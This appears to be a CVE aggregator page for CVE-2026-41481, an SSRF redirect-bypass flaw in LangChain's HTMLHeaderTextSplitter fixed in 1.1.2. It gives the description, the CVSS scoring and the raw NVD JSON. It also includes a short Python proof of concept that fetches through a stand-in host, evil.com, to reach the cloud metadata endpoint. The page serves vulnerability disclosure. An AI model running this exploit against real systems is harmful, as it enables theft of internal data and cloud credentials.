CVE-2026-41481

Description

LangChain is a framework for building agents and LLM-powered applications. Prior to langchain-text-splitters 1.1.2, HTMLHeaderTextSplitter.split_text_from_url() validated the initial URL using validate_safe_url() but then performed the fetch with requests.get() with redirects enabled (the default). Because redirect targets were not revalidated, a URL pointing to an attacker-controlled server could redirect to internal, localhost, or cloud metadata endpoints, bypassing SSRF protections. The response body is parsed and returned as Document objects to the calling application code. Whether this constitutes a data exfiltration path depends on the application: if it exposes Document contents (or derivatives) back to the requester who supplied the URL, sensitive data from internal endpoints could be leaked. Applications that store or process Documents internally without returning raw content to the requester are not directly exposed to data exfiltration through this issue. This vulnerability is fixed in 1.1.2.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:langchain:langchain-text-splitters:*:*:*:*:*:*:*:* - VULNERABLE

langchain-text-splitters < 1.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-41481
# This script demonstrates how an attacker might trigger the SSRF.
# It requires a vulnerable version of langchain-text-splitters (< 1.1.2)

from langchain_text_splitters import HTMLHeaderTextSplitter

# The attacker controls 'evil.com' and configures it to redirect
# requests to an internal metadata service (e.g., AWS IMDS)
attacker_controlled_url = "http://evil.com/redirect_to_metadata"

def exploit_ssrf():
    try:
        # Initialize the splitter
        splitter = HTMLHeaderTextSplitter()
        
        # The vulnerable function validates 'attacker_controlled_url' (passes),
        # but follows the redirect to http://169.254.169.254/latest/meta-data/
        print(f"[*] Attempting to split text from URL: {attacker_controlled_url}")
        
        # In vulnerable versions, this triggers the SSRF
        docs = splitter.split_text_from_url(attacker_controlled_url)
        
        print("[+] Request successful. Data retrieved:")
        for doc in docs:
            # If the app prints this back, data is exfiltrated
            print(doc.page_content)
            
    except Exception as e:
        print(f"[-] Exploit failed or error occurred: {e}")

if __name__ == "__main__":
    exploit_ssrf()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41481
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41481
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41481/
[4] VulDB https://vuldb.com/cve/CVE-2026-41481
[5] https://github.com/langchain-ai/langchain/security/advisories/GHSA-fv5p-p927-qmxr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41481", "sourceIdentifier": "[email protected]", "published": "2026-04-24T21:16:19.490", "lastModified": "2026-04-28T15:43:13.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangChain is a framework for building agents and LLM-powered applications. Prior to langchain-text-splitters\n 1.1.2, HTMLHeaderTextSplitter.split_text_from_url() validated the initial URL using validate_safe_url() but then performed the fetch with requests.get() with redirects enabled (the default). Because redirect targets were not revalidated, a URL pointing to an attacker-controlled server could redirect to internal, localhost, or cloud metadata endpoints, bypassing SSRF protections. The response body is parsed and returned as Document objects to the calling application code. Whether this constitutes a data exfiltration path depends on the application: if it exposes Document contents (or derivatives) back to the requester who supplied the URL, sensitive data from internal endpoints could be leaked. Applications that store or process Documents internally without returning raw content to the requester are not directly exposed to data exfiltration through this issue. This vulnerability is fixed in 1.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langchain-text-splitters:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.2", "matchCriteriaId": "6B5FD4DD-C579-4824-8988-4C702E1B2D24"}]}]}], "references": [{"url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-fv5p-p927-qmxr", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}